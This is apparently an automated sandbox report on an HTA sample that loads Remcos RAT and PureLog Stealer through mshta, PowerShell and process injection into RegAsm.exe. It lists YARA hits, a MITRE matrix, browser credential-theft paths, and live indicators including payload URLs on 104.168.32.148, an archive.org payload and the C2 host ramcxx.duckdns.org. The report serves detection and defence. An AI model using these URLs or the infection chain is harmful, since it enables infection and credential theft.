                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 9.2.powershell.exe.60cff68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.60cff68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.8730000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.8730000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040BA4D
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db11_2_0040BB6B

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YTJump to behavior
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 9.2.powershell.exe.60cff68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.60cff68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.8730000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.8730000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe11_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts1
                      Native API                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		21
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts22
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Access Token Manipulation                      		1
                      Software Packing                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares211
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		Login Hook1
                      Windows Service                      		1
                      DLL Side-Loading                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object Model3
                      Clipboard Data                      		1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts4
                      PowerShell                      		Network Logon Script222
                      Process Injection                      		1
                      Bypass User Account Control                      		LSA Secrets34
                      System Information Discovery                      		SSHKeylogging2
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials21
                      Security Software Discovery                      		VNCGUI Input Capture213
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Virtualization/Sandbox Evasion                      		DCSync21
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518499 Sample: LJ1IZDkHyE.hta Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 55 ramcxx.duckdns.org 2->55 57 ia600100.us.archive.org 2->57 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 73 20 other signatures 2->73 12 mshta.exe 1 2->12         started        signatures3 71 Uses dynamic DNS services 55->71 process4 signatures5 95 Suspicious command line found 12->95 97 PowerShell case anomaly found 12->97 15 cmd.exe 1 12->15         started        process6 signatures7 107 Detected Cobalt Strike Beacon 15->107 109 Suspicious powershell command line found 15->109 111 Wscript starts Powershell (via cmd or directly) 15->111 113 PowerShell case anomaly found 15->113 18 powershell.exe 3 45 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 59 104.168.32.148, 49704, 49708, 80 AS-COLOCROSSINGUS United States 18->59 47 nicemeetingsofpictureclearthingstob.Vbs, Unicode 18->47 dropped 49 C:\Users\user\AppData\...\rfrvbpim.cmdline, Unicode 18->49 dropped 75 Detected Cobalt Strike Beacon 18->75 77 Suspicious powershell command line found 18->77 79 Obfuscated command line found 18->79 81 3 other signatures 18->81 25 wscript.exe 1 18->25         started        28 csc.exe 3 18->28         started        file10 signatures11 process12 file13 87 Detected Cobalt Strike Beacon 25->87 89 Suspicious powershell command line found 25->89 91 Wscript starts Powershell (via cmd or directly) 25->91 93 3 other signatures 25->93 31 powershell.exe 7 25->31         started        53 C:\Users\user\AppData\Local\...\rfrvbpim.dll, PE32 28->53 dropped 34 cvtres.exe 1 28->34         started        signatures14 process15 signatures16 115 Detected Cobalt Strike Beacon 31->115 117 Suspicious powershell command line found 31->117 119 Obfuscated command line found 31->119 36 powershell.exe 15 15 31->36         started        40 conhost.exe 31->40         started        process17 dnsIp18 61 ia600100.us.archive.org 207.241.227.240, 443, 49705 INTERNET-ARCHIVEUS United States 36->61 83 Writes to foreign memory regions 36->83 85 Injects a PE file into a foreign processes 36->85 42 RegAsm.exe 3 2 36->42         started        signatures19 process20 dnsIp21 63 ramcxx.duckdns.org 45.134.140.70, 49711, 49713, 49715 INETLTDTR Georgia 42->63 51 C:\ProgramData\remcos\logs.dat, data 42->51 dropped 99 Contains functionality to bypass UAC (CMSTPLUA) 42->99 101 Detected Remcos RAT 42->101 103 Contains functionalty to change the wallpaper 42->103 105 5 other signatures 42->105 file22 signatures23

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      LJ1IZDkHyE.hta26%ReversingLabsScript-WScript.Trojan.Remcos

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                      http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF100%Avira URL Cloudmalware
                      https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content0%Avira URL Cloudsafe
                      http://104.168.32.1480%Avira URL Cloudsafe
                      http://104.168.32.148/345/niceme0%Avira URL Cloudsafe
                      https://ia600100.us.archivL0%Avira URL Cloudsafe
                      http://104.168.32.148/345/CHPPZA.txt0%Avira URL Cloudsafe
                      http://www.microsoft.0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      http://104.168.32.148/0%Avira URL Cloudsafe
                      http://crl.micro0%Avira URL Cloudsafe
                      https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt100%Avira URL Cloudmalware
                      http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL0%Avira URL Cloudsafe
                      https://ia600100.us.archive.org0%Avira URL Cloudsafe
                      ramcxx.duckdns.org100%Avira URL Cloudmalware
                      http://ia600100.us.archive.org0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ia600100.us.archive.org
                      		207.241.227.240
                      		truefalse
                        		unknown
                        ramcxx.duckdns.org
                        		45.134.140.70
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://104.168.32.148/345/CHPPZA.txttrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                          • Avira URL Cloud: malware
                          		unknown
                          ramcxx.duckdns.orgtrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://104.168.32.148/345/nicemepowershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Contentpowershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ia600100.us.archivLpowershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://go.micropowershell.exe, 00000009.00000002.2256807258.00000000053AF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.microsoft.powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
